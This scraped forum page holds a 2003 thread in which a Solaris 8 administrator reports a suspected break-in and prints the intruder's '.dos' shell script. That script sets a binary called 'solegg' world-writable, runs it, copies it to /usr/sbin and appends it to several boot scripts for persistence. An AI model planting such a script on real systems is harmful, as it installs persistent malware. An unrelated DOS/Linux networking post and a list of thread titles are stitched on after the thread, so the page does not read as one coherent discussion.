solegg DOS

Post by xcwill » Sun, 21 Sep 2003 11:32:38

I beleive I have been Hacked, and I have never heard of this.
OS = Solaris 8
Marner450
running HPopenview

/usr/sbin/solegg

install dir
# cd /usr/share/man/.../sol

how it got in = unknown

infected Sep 4
executed Sep 12

Unfortunately I am posting this after I shut down the box - So I cant
Show you all the start up scripts. Or Install script.... I am not much
help -- just want to know if anyone else has seen or head of this.

Many thanks

xcwillix

solegg DOS

Post by xcwill » Sun, 21 Sep 2003 21:01:46

> I beleive I have been Hacked, and I have never heard of this.
> OS = Solaris 8
> Marner450
> running HPopenview

> /usr/sbin/solegg

> install dir
> # cd /usr/share/man/.../sol

> how it got in = unknown

> infected Sep 4
> executed Sep 12

> Unfortunately I am posting this after I shut down the box - So I cant
> Show you all the start up scripts. Or Install script.... I am not much
> help -- just want to know if anyone else has seen or head of this.

> Many thanks

> xcwillix

Ok here is more info --

# cd /usr/share/man/.../sol

# vi .dos

#!/bin/sh
chmod 777 solegg
./solegg
cp solegg /usr/sbin/solegg
chmod 777 /usr/sbin/solegg
echo "/usr/sbin/solegg" >> /etc/rcS.d/S30rootusr.sh
echo "/usr/sbin/solegg" >> /etc/init.d/rootusr
echo "/usr/sbin/solegg" >> /etc/rc3

Thanks again

xcwillix

HI there,

In about march we should be getting a second PC in our house. I was
concidering trying to network the two machines. One of the machines
is going to be a DOS/Windows affair while the other one is hoping
to become a DOS and Linux setup. I have a few questions that I hope
that someone out there can answer. (The kind of network I'm concid-
ering is peer-to-peer, I think)

1) Using Novell Netware light on the DOS/Windows machine, could it
connect to the Linux machine using standard networking stuff? Would
I be able to have netware on my DOS partition of my Linux/DOS machine
so that when I boot it up using DOS I'm still connected?

2) If I were using the Linux front end for DOOM, could I still play
a multiplayer game across the network? Or would I have to go back to
DOS?

3) Just out of curiosity, could anyone give me info on cost. I've
got a home made estimate (made from various sources) of :

Cabling (roughly)                               :20
                                                ----
Total                                           136

This is a rough estimate, if anyone can confirm or deny this value
please set me straight.

Answers would be much appersiated as it will influence my decision
as to weather to get the network and/or to get Linux.

TTFN and TC, Michael Dales

-'Damn you and your networking problems Q!'-Picard

2. how to print the username and the date while printing with samba

3. accessing dos partitions with wd7000fasst scsi, isc unix 2.2, dos[345]

4. router/firewal (iptables) and lamp server in the same machine?

5. Uninstall Linux: Deleted "non dos partition" with DOS fdisk -- Now what?!?

6. KDE Consolle fonts under RH 8.0

7. Samba w/ DOS box - what does DOS need?

8. automatic start up of daemon/services on boot up

9. Can I boot from DOS to use DOS Device Drivers?

10. Mini Linux coexists in DOS partition and boot from DOS

11. Q: Filenames turnicated DOS to LINUX to DOS?

12. DEFBOOTSTR=dos should this allow dos to boot by default?

13. copying files from unix to dos system in dos readable format